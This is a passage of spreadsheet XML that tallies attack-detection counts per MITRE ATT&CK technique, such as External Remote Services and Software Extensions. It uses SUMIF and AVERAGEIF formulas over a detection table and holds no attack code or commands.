      </c>
      <c r="BR29" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS29" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>3</v>
      </c>
      <c r="BT29" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU29" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>9</v>
      </c>
      <c r="BV29" s="292">
        <v>5</v>
      </c>
      <c r="BW29" s="322">
        <v>5</v>
      </c>
      <c r="BX29" s="4" t="str">
        <f t="shared" si="11"/>
        <v>5 (5)</v>
      </c>
      <c r="BY29" s="12">
        <v>1</v>
      </c>
      <c r="BZ29" s="13">
        <v>1</v>
      </c>
      <c r="CA29" s="394">
        <v>5</v>
      </c>
      <c r="CB29" s="288">
        <v>10</v>
      </c>
      <c r="CC29" s="4">
        <v>10</v>
      </c>
      <c r="CD29" s="4" t="str">
        <f t="shared" si="12"/>
        <v>10 (10)</v>
      </c>
      <c r="CE29" s="4">
        <v>1</v>
      </c>
      <c r="CF29" s="4">
        <v>1</v>
      </c>
      <c r="CG29" s="13">
        <v>1</v>
      </c>
      <c r="CH29" s="394">
        <v>5</v>
      </c>
    </row>
    <row r="30" spans="1:86" ht="15" customHeight="1">
      <c r="A30" s="4">
        <f t="shared" si="13"/>
        <v>28</v>
      </c>
      <c r="B30" s="4" t="str">
        <f>IFERROR(VLOOKUP(A30,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1133</v>
      </c>
      <c r="C30" s="493" t="str">
        <f>IFERROR(VLOOKUP(B30,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>External Remote Services</v>
      </c>
      <c r="D30" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B30)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E30" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>32</v>
      </c>
      <c r="F30" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (32)</v>
      </c>
      <c r="G30" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>0</v>
      </c>
      <c r="H30" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>0</v>
      </c>
      <c r="I30" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J30" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>0</v>
      </c>
      <c r="K30" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0</v>
      </c>
      <c r="L30" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>0</v>
      </c>
      <c r="M30" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N30" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O30" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P30" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q30" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R30" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S30" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>0</v>
      </c>
      <c r="T30" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>0</v>
      </c>
      <c r="U30" s="4" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V30" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>0</v>
      </c>
      <c r="W30" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>0</v>
      </c>
      <c r="X30" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>0</v>
      </c>
      <c r="Y30" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>18</v>
      </c>
      <c r="Z30" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>8</v>
      </c>
      <c r="AA30" s="322" t="str">
        <f t="shared" si="3"/>
        <v>8 (18)</v>
      </c>
      <c r="AB30" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>0</v>
      </c>
      <c r="AC30" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD30" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>8</v>
      </c>
      <c r="AE30" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>4</v>
      </c>
      <c r="AF30" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>3</v>
      </c>
      <c r="AG30" s="322" t="str">
        <f t="shared" si="4"/>
        <v>3 (4)</v>
      </c>
      <c r="AH30" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>2</v>
      </c>
      <c r="AI30" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ30" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>3</v>
      </c>
      <c r="AK30" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>22</v>
      </c>
      <c r="AL30" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>11</v>
      </c>
      <c r="AM30" s="322" t="str">
        <f t="shared" si="5"/>
        <v>11 (22)</v>
      </c>
      <c r="AN30" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>5</v>
      </c>
      <c r="AO30" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP30" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>9</v>
      </c>
      <c r="AQ30" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR30" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS30" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT30" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU30" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV30" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW30" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>14</v>
      </c>
      <c r="AX30" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>5</v>
      </c>
      <c r="AY30" s="322" t="str">
        <f t="shared" si="7"/>
        <v>5 (14)</v>
      </c>
      <c r="AZ30" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>2</v>
      </c>
      <c r="BA30" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB30" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>5</v>
      </c>
      <c r="BC30" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>14</v>
      </c>
      <c r="BD30" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>5</v>
      </c>
      <c r="BE30" s="4" t="str">
        <f t="shared" si="8"/>
        <v>5 (14)</v>
      </c>
      <c r="BF30" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>2</v>
      </c>
      <c r="BG30" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH30" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>5</v>
      </c>
      <c r="BI30" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ30" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK30" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL30" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM30" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN30" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO30" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>32</v>
      </c>
      <c r="BP30" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>30</v>
      </c>
      <c r="BQ30" s="4" t="str">
        <f t="shared" si="10"/>
        <v>30 (32)</v>
      </c>
      <c r="BR30" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS30" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>7</v>
      </c>
      <c r="BT30" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU30" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>30</v>
      </c>
      <c r="BV30" s="292">
        <v>0</v>
      </c>
      <c r="BW30" s="322">
        <v>0</v>
      </c>
      <c r="BX30" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY30" s="12">
        <v>0</v>
      </c>
      <c r="BZ30" s="13">
        <v>0</v>
      </c>
      <c r="CA30" s="394">
        <v>0</v>
      </c>
      <c r="CB30" s="288">
        <v>0</v>
      </c>
      <c r="CC30" s="4">
        <v>0</v>
      </c>
      <c r="CD30" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE30" s="4">
        <v>0</v>
      </c>
      <c r="CF30" s="4">
        <v>0</v>
      </c>
      <c r="CG30" s="13">
        <v>0</v>
      </c>
      <c r="CH30" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:86" ht="15" customHeight="1">
      <c r="A31" s="4">
        <f t="shared" si="13"/>
        <v>29</v>
      </c>
      <c r="B31" s="4" t="str">
        <f>IFERROR(VLOOKUP(A31,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1176</v>
      </c>
      <c r="C31" s="493" t="str">
        <f>IFERROR(VLOOKUP(B31,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Software Extensions</v>
      </c>
      <c r="D31" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B31)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E31" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>217</v>
      </c>
      <c r="F31" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (217)</v>
      </c>
      <c r="G31" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>0</v>
      </c>
      <c r="H31" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>0</v>
      </c>
      <c r="I31" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J31" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>0</v>
      </c>
      <c r="K31" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0</v>
      </c>
      <c r="L31" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>0</v>
      </c>
      <c r="M31" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N31" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O31" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P31" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q31" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R31" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S31" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>0</v>
      </c>
      <c r="T31" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>0</v>
      </c>
      <c r="U31" s="4" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V31" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>0</v>
      </c>
      <c r="W31" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>0</v>
      </c>
      <c r="X31" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>0</v>
      </c>
      <c r="Y31" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>224</v>
      </c>
      <c r="Z31" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>215</v>
      </c>
      <c r="AA31" s="322" t="str">
        <f t="shared" si="3"/>
        <v>215 (224)</v>
      </c>
      <c r="AB31" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>0</v>
      </c>
      <c r="AC31" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD31" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>215</v>
      </c>
      <c r="AE31" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>216</v>
      </c>
      <c r="AF31" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>214</v>
      </c>
      <c r="AG31" s="322" t="str">
        <f t="shared" si="4"/>
        <v>214 (216)</v>
      </c>
      <c r="AH31" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>3</v>
      </c>
      <c r="AI31" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ31" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>212</v>
      </c>
      <c r="AK31" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>440</v>
      </c>
      <c r="AL31" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>429</v>
      </c>
      <c r="AM31" s="322" t="str">
        <f t="shared" si="5"/>
        <v>429 (440)</v>
      </c>
      <c r="AN31" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>5</v>
      </c>
      <c r="AO31" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP31" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>215</v>
      </c>
      <c r="AQ31" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR31" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS31" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT31" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU31" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV31" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW31" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>12</v>
      </c>
      <c r="AX31" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>3</v>
      </c>
      <c r="AY31" s="322" t="str">
        <f t="shared" si="7"/>
        <v>3 (12)</v>
      </c>
      <c r="AZ31" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>1</v>
      </c>
      <c r="BA31" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB31" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>3</v>
      </c>
      <c r="BC31" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>12</v>
      </c>
      <c r="BD31" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>3</v>
      </c>
      <c r="BE31" s="4" t="str">
        <f t="shared" si="8"/>
        <v>3 (12)</v>
      </c>
      <c r="BF31" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>1</v>
      </c>
      <c r="BG31" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH31" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>3</v>
      </c>
      <c r="BI31" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ31" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK31" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL31" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM31" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN31" s="394">
